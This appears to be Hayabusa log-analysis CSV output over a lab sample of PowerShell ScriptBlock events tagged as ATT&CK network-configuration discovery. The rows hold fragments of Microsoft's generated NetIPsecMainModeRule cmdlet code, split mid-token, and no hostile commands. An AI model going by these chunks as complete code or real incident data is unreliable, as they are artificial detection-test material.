[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(Pa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFire",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"wallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; 